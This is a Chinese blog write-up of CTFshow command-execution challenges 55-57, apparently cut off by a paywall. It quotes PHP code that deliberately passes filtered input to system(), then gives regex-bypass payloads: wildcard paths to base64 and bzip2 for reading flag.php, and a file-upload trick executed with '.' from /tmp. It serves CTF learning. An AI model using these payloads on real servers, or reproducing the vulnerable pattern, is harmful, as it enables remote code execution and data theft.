[CTFSHOW]命令执行55-74

最新推荐文章于 2024-05-11 19:12:18 发布
最新推荐文章于 2024-05-11 19:12:18 发布
阅读量1.5k 收藏 3
点赞数 2
分类专栏: 刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_51078229/article/details/114366053
版权

web 55

if(isset($_GET['c'])){
   
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)){
   
        system($c);
    }
}else{
   
    highlight_file(__FILE__);
}

bin目录:
bin为binary的简写主要放置一些 系统的必备执行档例如:cat、cp、chmod df、dmesg、gzip、kill、ls、mkdir、more、mount、rm、su、tar、base64等

解法一:

这里我们可以利用 base64 中的64 进行通配符匹配 即 /bin/base64 flag.php
payload:c=/???/????64 ????.???

解法二:
usr/bin目录:
主要放置一些应用软件工具的必备执行档例如c++、g++、gcc、chdrv、diff、dig、du、eject、elm、free、gnome、 zip、htpasswd、kfm、ktop、last、less、locale、m4、make、man、mcopy、ncftp、 newaliases、nslookup passwd、quota、smb、wget等。

我们可以利用/usr/bin下的bzip2
意思就是说我们先将flag.php文件进行压缩,然后再将其下载,即:/usr/bin/bzip2 flag.php
payload:?c=/???/???/????2 ????.???

web 56

很骚的一道题,把数字和字母都ban掉了

if(isset($_GET['c'])){
   
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\\$|\(|\{|\'|\"|\`|\%|\x09|\x26|\>|\</i", $c)){
   
        system($c);
    }
}else{
   
    highlight_file(__FILE__);
}

这个大佬有骚操作,p神无字母数字webshell

点命令(.)
.或者叫period,它的作用和source一样,就是用当前的shell执行一个文件中的命令。用. file执行文件,是不需要file有x权限的。那么,如果目标服务器上有一个我们可控的文件,那就可以利用.来执行它

可控文件
这个可控文件怎么得到?我们可以发送一个上传文件的POST包,此时PHP会将我们上传的文件保存在临时文件夹下,默认的文件名是/tmp/phpXXXXXX,文件名最后6个字符是随机的大小写字母
类似于这样:
在这里插入图片描述
我们只要找到一个可以表示大写字母的glob通配符,就能精准找到我们要执行的文件。
ascii码表中,大写字母位于@[之间
在这里插入图片描述
所以可以用glob通配符[@-[]来表示大写字母

通配符

  • 除了常见的?和*,还有glob支持用[^x]的方法来构造这个位置不是字符x
  • 有一个特殊约定:两个字符之间用“-”分隔表示范围,类似于这样[a-z]表示a到z的字母在这里插入图片描述

Linux.sh语法
程序必须以下面的行开始(必须方在文件的第一行):
#!/bin/sh
符号#!用来告诉系统它后面的参数是用来执行该文件的程序,解释此脚本的shell的路径

思路:

  • 用post把shell传上服务器,在shell里面写好我们想执行的代码
  • 用glob通配符选中可控文件并执行他

post包:

<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Document</title>
</head>
<body>
    <form action="http://37a16111-50c6-4cea-bbb9-697da2a85c1d.chall.ctf.show:8080/" method="POST" enctype="multipart/form-data">
        <input type="file" name="file" id="file">
        <input type="submit" name="submit" value="submit">
    </form>
</body>
</html>

给c传值的payload:?c=.%20/???/????????[@-[]
成功执行了ls命令
在这里插入图片描述
接下来就是cat flag了
在这里插入图片描述
这题学到很多知识点,是个好题

web 57

还是过滤了数字和字母,不仅如此,还过滤了|\.|\,|\?|\*|\-|\=|\[意味着刚刚那题的方法以及不适应了,因为glob通配符给ban了

if(isset($_GET['c'])){
   
    $c=$_GET['c'];
    if(!preg_match("/\;|[a-z]|[0-9]|\`|\|\#|\'|\"|\`|\%|\x09|\x26|\x0a|\>|\<|\.|\,|\?|\*|\-|\=|\[/i", $c)){
   
        system("cat ".$c.".php");
    }
}else{
   
    highlight_file(__FILE__);
}

文章有提示,flag在36.php//flag in 36.php,所以可以想办法凑出一个36来
可以用这种操作

最低0.47元/天 解锁文章
huamanggg
关注
  • 2
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
ctfshow web223-group盲注无数字
10-21
ctfshow web223-group盲注无数字
ctf.show
giaogiao123的博客
02-15 255
进入页面首先看到一个题目看hint ?cmd 有了源码 看大佬的笔记这是一个php短标签,正则匹配 考虑绕过 ?cmd=?><?=`/???/?p /???????? p.p`;?> 然后出现文件下载,咱也不知道为撒,反正师傅都是这么写的,让我学明白了在更。 ...
2024年网络安全最全CTFshow web入门 web41~web55 命令执行_ctfshow web41,网络安全面试选择题
最新发布
2401_84264692的博客
05-11 556
cat、flag、[空格]、[0-9]、*、more、wget、less、head、sort、tail、sed、cut、tac、awk、strings、od、curl、`、%、\x09、\x26、>、、
ctfshow-命令执行
weixin_45794666的博客
12-19 4094
命令执行 反引号`` 反引号``即命令替换 是指Shell可以先执行``中的命令,将输出结果暂时保存,在适当的地方输出 单引号,双引号 适用条件:过滤了字符串 放在shell命令中,绕过正则匹配且不影响原意 空格绕过 > < <> 重定向符 %09(需要php环境) ${IFS} $IFS$9 {cat,flag.php} //用逗号实现了空格功能 %20 %09 读文件绕过(cat绕过) 适用条件:过滤了cat 1)more:一页一页的显示档案内容 (2)less:与 mor
CTFshow web(29-51) 命令执行
qq_37561898的博客
01-21 922
CTF,ctfshow,命令执行
ctfshow RCE极限挑战 wp
m0_64815693的博客
11-20 3662
ctfshow rce极限挑战 1-5 wp
CTF 总结02:preg_match()绕过
热门推荐
weixin_42789937的博客
01-18 1万+
preg_match()绕过,小白总结,修改过一次,后期会根据做题经历有所增补~
ctfshow-VIP题目-Web-详细解题思路
01-27
CTFSHOW-VIP题目-Web-详细解题思路 本文档总结了CTFSHOW-VIP题目-Web的详细解题思路,涵盖了多个Web安全领域的知识点,包括WP源码泄露、协议头信息泄露、robots后台泄露、phps源码泄露、源码压缩包泄露、版本控制...
CTFshow-菜狗杯-WEB-变量循环取值-我的眼里只有$
03-04
【压缩包子文件的文件名称列表】"CTFshow-变量循环取值-我的眼里只有$" 提供了一个可能包含源代码、日志、测试数据或其他相关资源的文件。参赛者可能需要分析这个文件,寻找与题目相关的线索,比如错误的变量赋值、...
ctfshow web139命令盲注脚本
10-21
ctfshow靶场 web入门 web139 命令盲注脚本
ctfshow-web41~60-WP
02-21
ctfshow-web41~60-WPctfshow-web41~60-WP
无字母命令执行
WHQ556677的博客
12-30 1160
先看一道题 <?php error_reporting(0); show_source(__FILE__); if (isset($_GET['a'])) { $c=$_GET['a']; if (!preg_match("/\;|[a-z]|\`|\%|\x09|\x26|\>|\</i", $c)) { system($c); }else { echo "hacker!"; } } ?> 代码审计 过滤了字母
ctfshow php特性上
weixin_63231007的博客
05-30 851
web93 $num = $_GET['num']; if($num==4476){ die("no no no!"); } if(preg_match("/[a-z]/i", $num)){ die("no no no!"); } if(intval($num,0)==4476){ echo $flag; }else{ echo intval($num,0); } 使用进制计算:
php常用绕正则姿势
zhwho的博客
07-14 894
异或绕过 接上篇正则表达式,如果出现这样的正则: if (!preg_match('/[a-z 0-9]/is',$_GET['a'])) { eval($_GET['a']); } else{ echo "hacker"; } 即get传参的a变量中不能有数字和字母,但如果想拿到shell就要传入类似eval($_POST[‘shell’])的语句,但这时字母被禁,只能通过其他方式来构造类似的语句,这里就可以用异或规则来绕过。 先介绍下什么是异或,举个例子: 字符:? ASCII码
ctfshow 命令执行
m0_74097148的博客
05-21 3501
dev/null文件可以被看作是一个“黑洞”文件。它等价于一个只写的的文件。所有写入它的内容都会永远丢失(因为不可读)。这里说flag在36.php中,那么我们想办法构造处36即可.这里参考大佬的做法。/dev/null 2>&1主要意思是不进行回显,让命令回显,我们进行命令分隔。如下图第一个元素为点号。
ctfshow web入门之命令执行
uuzfumo的博客
12-17 1078
命令执行姿势
bin.base64和bin.hex编码与解码
weixin_34236497的博客
07-25 1040
Function EncodeBase64(bytesData) Dim objXd Set objXd=Server.CreateObject("msxml.domdocument") Call objXd.loadXml("<root/>") objXd.DocumentElement.DataType="bin.base64" objXd.Docu...
软件测试之JUnit单元测试 xxxggg
浅ピ筱的博客
05-07 998
软件测试分类 黑盒测试:不需要考虑程序内部是如何实现的,只是测试程序说明书上所说的功能是否都实现了。 白盒测试:知道程序内部是如何实现的,通过程序内部的具体实现逻辑来设计测试用例,测试程序在各种极端情况下是否正常运行。(JUnit属于白盒测试) JUnit的使用 步骤 定义一个测试类(测试用例) - 建议: - 测试类的类名:被测试类的类名+Test,如CalculatorTe...
linux中的分号&&和&,|和||说明与用法
qq_30339595的博客
01-03 416
“;”分号用法 方式:command1 ; command2 用;号隔开每个命令, 每个命令按照从左到右的顺序,顺序执行, 彼此之间不关心是否失败, 所有命令都会执行。 “| ”管道符用法 上一条命令的输出,作为下一条命令参数 方式:command1 | command2 Linux所提供的管道符“|”将两个命令隔开,管道符左边命令的输出就会作为管道符右边命令的输入。连续使用管道意味着第一个命令的...
ctfshow web入门命令执行
09-05
在CTF中,web入门命令执行指的是通过Web应用程序的漏洞,将恶意的命令注入到应用程序中并执行。这样的攻击可以导致未经授权的访问和操纵应用程序的数据和功能。 根据引用中提供的信息,可以看到一些常见的双写绕过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

huamanggg

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值